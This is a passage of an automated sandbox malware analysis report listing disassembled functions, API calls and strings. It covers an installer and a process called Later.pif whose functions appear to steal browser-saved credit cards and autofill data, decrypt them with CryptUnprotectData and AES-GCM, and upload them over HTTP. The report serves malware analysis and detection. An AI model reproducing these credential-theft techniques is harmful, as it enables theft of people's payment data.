Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
PetFunctions, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$PetFunctions$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-320002975
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Later.pifPID: 6584, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	125

Executed Functions

Function 0140D180 Relevance: 103.9, APIs: 32, Strings: 26, Instructions: 2430networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0140D180: WSAStartup.WS2_32(00000202,?), ref: 0140DCE9

WSACleanup.WS2_32 ref: 0140DD59

Strings

Failed to send data, xrefs: 0140E48F
Failed to create socket, xrefs: 0140F16A
Invalid hex digit, xrefs: 0140F01B
Failed to read data, xrefs: 0140F0F5
0, xrefs: 0140D735
Failed to connect, xrefs: 0140E354, 0140E35F
Unsupported transfer encoding: , xrefs: 0140EEDD
transfer-encoding, xrefs: 0140E79E
Authorization, xrefs: 0140D6BF
Failed to get socket option, xrefs: 0140F1C7
Unsupported protocol, xrefs: 0140F106
Invalid WinSock version, xrefs: 0140DD5F
WSAStartup failed, xrefs: 0140DD80
Failed to get socket flags, xrefs: 0140F19E
Only HTTP scheme is supported, xrefs: 0140DBB3
content-length, xrefs: 0140E88E
Invalid digit, xrefs: 0140EF11
Basic , xrefs: 0140D668
Invalid chunk, xrefs: 0140EFFB
Failed to get address info of , xrefs: 0140F12F
http, xrefs: 0140D1F3, 0140DF72
Ds, xrefs: 0140DC97
HTTP/1.1, xrefs: 0140D80C
Host, xrefs: 0140D392
Content-Length, xrefs: 0140D42D
chunked, xrefs: 0140E80D

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CleanupStartup
String ID: HTTP/1.1$0$Authorization$Basic $Content-Length$Failed to connect$Failed to create socket$Failed to get address info of $Failed to get socket flags$Failed to get socket option$Failed to read data$Failed to send data$Host$Invalid WinSock version$Invalid chunk$Invalid digit$Invalid hex digit$Only HTTP scheme is supported$Unsupported protocol$Unsupported transfer encoding: $WSAStartup failed$chunked$content-length$http$transfer-encoding$Ds
API String ID: 915672949-2844231948
Opcode ID: bef6e49ebff23b103a4240470e063bcc3602f10ac1fc7e0b1b354d39bf611b75
Instruction ID: f4b942c671784a037ab8b101706475b566045c7a4def98ab7813c0af8e3290d9
Opcode Fuzzy Hash: bef6e49ebff23b103a4240470e063bcc3602f10ac1fc7e0b1b354d39bf611b75
Instruction Fuzzy Hash: F823F371D002198FDB2ACF69CC847EEBBB1BF55310F1486AED519AB2A1D7709A84CF50

Function 01415030 Relevance: 72.4, APIs: 19, Strings: 21, Instructions: 2384fileencryptionCOMMON

Download Yara Rule

APIs

__Xtime_get_ticks.LIBCPMT ref: 014150A5
omp_get_thread_num.VCOMP140(015103FB,00000000,940E2C7A,00000000,?), ref: 014150AE
CopyFileA.KERNEL32(?,?,00000000), ref: 01415407
GetFileAttributesA.KERNELBASE(?), ref: 01415DFB
__Xtime_get_ticks.LIBCPMT ref: 01415F75
omp_get_thread_num.VCOMP140 ref: 01415F7E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01415FA4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014150D4

Part of subcall function 0140FB40: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0140FB71

CopyFileA.KERNEL32(?,?,00000000), ref: 014162EF
BCryptOpenAlgorithmProvider.BCRYPT(0152C168,AES,00000000,00000000), ref: 0141654E
GetLastError.KERNEL32 ref: 01416558
BCryptSetProperty.BCRYPT(ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0141657A
GetLastError.KERNEL32 ref: 01416584
BCryptGenerateSymmetricKey.BCRYPT(0152C170,00000000,00000000,?,?,00000000), ref: 014165B1
GetLastError.KERNEL32 ref: 014165BB
BCryptDecrypt.BCRYPT ref: 01416695
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0141670B
SetFileAttributesA.KERNELBASE(?,00000080), ref: 0141749F
DeleteFileA.KERNELBASE(?), ref: 014174A6

Strings

[DEBUG] Crypt::BCrypt::Init: can't set chaining mode. Last error code: %d , xrefs: 0141658B
ChainingModeGCM, xrefs: 0141656A
[DEBUG] Crypt::BCrypt::Init: can't initialize cryptoprovider. Last error code: %d , xrefs: 0141655F
; Value: , xrefs: 01415549
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 01416329
Month/Year: , xrefs: 01416822
application/octet-stream, xrefs: 01415D0E, 01417398
sendfills, xrefs: 01415D3A
ChainingMode, xrefs: 0141656F
Name: , xrefs: 014154F8
Holder: , xrefs: 014168EC
AES, xrefs: 01416542
\Temp\tmp, xrefs: 014150F7, 01415FC7
<AND>count=, xrefs: 01415A30, 014170B7
<AND>hwid=, xrefs: 01415950, 01416FD4
<AND>name=, xrefs: 0141595D, 01416FE1
<AND>log=, xrefs: 014159C8, 0141704C
Card Number: , xrefs: 0141680F
sendcards, xrefs: 014173C4
SELECT name, value FROM autofill, xrefs: 01415438
